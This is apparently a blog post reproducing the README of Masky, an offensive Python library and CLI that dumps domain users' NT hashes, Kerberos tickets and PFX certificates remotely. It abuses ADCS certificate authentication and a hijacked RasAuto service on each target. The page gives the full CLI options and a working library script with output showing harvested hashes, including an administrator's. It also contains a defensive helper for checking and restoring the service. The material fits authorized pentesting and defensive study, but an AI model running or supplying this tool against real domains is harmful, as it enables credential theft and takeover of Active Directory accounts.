Tuesday, August 30, 2022
Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory

Masky is a Python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX files, NT hashes and TGTs on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. It only takes advantage of legitimate Windows and Active Directory features: token impersonation, certificate authentication via Kerberos, and NT hash retrieval via PKINIT. A blog post was published detailing the implemented techniques and how Masky works.

Masky's source code is largely based on the excellent Certify and Certipy tools. I really thank their authors for their research on offensive exploitation techniques against ADCS (see the Acknowledgments section).

Installation

The Masky python3 library and its associated CLI can simply be installed from the public PyPI repository.

The Masky agent executable is already included within the PyPI package.

Moreover, if you need to modify the agent, the C# code can be recompiled via the Visual Studio project located in agent/Masky.sln. It requires .NET Framework 4 to be built.

Usage

Masky has been designed as a Python library. A command line interface was created on top of it to ease its usage during pentest or Red Team activities.

For both usages, you first need to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can easily be retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automatic roll-back of its initial ImagePath value, an unexpected error during Masky's runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such an unwanted stop.
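The cleanup caveat above deserves a check. Below is an added example, not part of Masky or of the original page, that parses the output of `sc.exe qc RasAuto` (collected from a target after an aborted run) and reports whether the service still points at the stock svchost.exe host process; it also builds the `sc.exe config` command that puts a previously saved ImagePath back. Both sample outputs are constructed here, and the leftover agent path in the second one is hypothetical: the page does not say where Masky drops its agent.

```python
import re

# Constructed sample output of `sc.exe qc RasAuto` from a host whose service
# configuration is untouched. The svchost.exe arguments vary between Windows
# builds, so the check below only looks at the executable, not its arguments.
CLEAN_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RasAuto
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Remote Access Auto Connection Manager
        DEPENDENCIES       : RasMan
                           : Tapisrv
        SERVICE_START_NAME : LocalSystem
"""

# Constructed sample from a host where the roll-back did not run. The agent
# path is hypothetical: the page does not document where Masky drops its agent.
DIRTY_SC_QC = CLEAN_SC_QC.replace(
    r"C:\WINDOWS\System32\svchost.exe -k netsvcs -p",
    r"C:\Windows\Temp\agent.exe",
)

# One `sc qc` line: an optional FIELD_NAME, a colon, the value. A line with no
# field name is a continuation of the previous field (DEPENDENCIES prints one
# dependency per line).
_FIELD_RE = re.compile(r"^\s*([A-Z_]*)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text):
    """Parse `sc qc <service>` output into a {FIELD: value} dict."""
    fields = {}
    last = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("[SC]"):
            continue
        match = _FIELD_RE.match(line)
        if match is None:
            continue
        key, value = match.groups()
        if key:
            fields[key] = value
            last = key
        elif last is not None and value:
            fields[last] = f"{fields[last]}, {value}"
    return fields


def service_executable(binpath):
    """Return just the executable from a binPath, honouring a quoted path."""
    binpath = binpath.strip()
    if binpath.startswith('"'):
        end = binpath.find('"', 1)
        return binpath[1:end] if end > 0 else binpath[1:]
    return binpath.split(" ", 1)[0]


def rasauto_restored(sc_qc_output):
    """True when RasAuto is still hosted by the stock System32\\svchost.exe."""
    cfg = parse_sc_qc(sc_qc_output)
    if cfg.get("SERVICE_NAME", "").lower() != "rasauto":
        raise ValueError("expected `sc qc RasAuto` output")
    exe = service_executable(cfg.get("BINARY_PATH_NAME", ""))
    return exe.lower().endswith(r"\system32\svchost.exe")


def restore_command(host, original_binpath):
    """Build the sc.exe command that puts a saved ImagePath back on `host`.

    `binPath=` must be followed by a space; that is sc.exe's own syntax.
    """
    return f'sc.exe \\\\{host} config RasAuto binPath= "{original_binpath}"'


if __name__ == "__main__":
    for label, output in (("clean host", CLEAN_SC_QC), ("dirty host", DIRTY_SC_QC)):
        print(f"{label}: RasAuto restored = {rasauto_restored(output)}")
    original = parse_sc_qc(CLEAN_SC_QC)["BINARY_PATH_NAME"]
    print(restore_command("srv-01.sec.lab", original))
```

Snapshot `sc.exe qc RasAuto` (or the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\RasAuto) before running Masky so that the restore command has a known-good value to put back; the check only tells you that something other than svchost.exe is registered, not what the original arguments were.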

Command line

The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows collecting the NT hashes, CCACHE and PFX files of 3 distinct domain users from the sec.lab testing domain.

Masky also provides options that are commonly offered by such tools (thread number, authentication mode, targets loaded from files, etc.).

Masky v0.0.3

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
             [targets ...]

positional arguments:
  targets               Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
  -h, --help            show this help message and exit
  -v, --verbose         Enable debugging messages
  -ts, --timestamps     Display timestamps for each log
  -t THREADS, --threads THREADS
                        Threadpool size (max 15)

Authentication:
  -d DOMAIN, --domain DOMAIN
                        Domain name to authenticate to
  -u USER, --user USER  Username to authenticate with
  -p PASSWORD, --password PASSWORD
                        Password to authenticate with
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
  -H HASHES, --hashes HASHES
                        Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
                        Certificate Authority Name (SERVER\CA_NAME)

Results:
  -nh, --no-hash        Do not request NT hashes
  -nt, --no-ccache      Do not save ccache files
  -np, --no-pfx         Do not save pfx files
  -o OUTPUT, --output OUTPUT
                        Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exist)

Python library

Below is a simple script using the Masky library to collect the secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
    # Define the authentication parameters
    ca = "srv-01.sec.lab\\sec-SRV-01-CA"
    dc_ip = "192.168.23.148"
    domain = "sec.lab"
    user = "askywalker"
    password = getpass()

    # Create a Masky instance with these credentials
    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

    # Set a target and run Masky against it
    target = "192.168.23.130"
    rslts = m.run(target)

    # Check if Masky successfully hijacked at least one user session
    # or if an unexpected error occurred
    if not rslts:
        return False

    # Loop on the MaskyResults object to display hijacked users and to retrieve their NT hashes
    print(f"Results from hostname: {rslts.hostname}")
    for user in rslts.users:
        print(f"\t - {user.domain}\\{user.name} - {user.nt_hash}")

    return True


if __name__ == "__main__":
    dump_nt_hashes()

Its execution generates the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
         - sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
         - sec\askywalker - 8928e0723012a8471c0084149c4e23b1
         - sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please take a look at the masky/lib/results.py module to check the methods and attributes provided by these two classes.

Acknowledgments
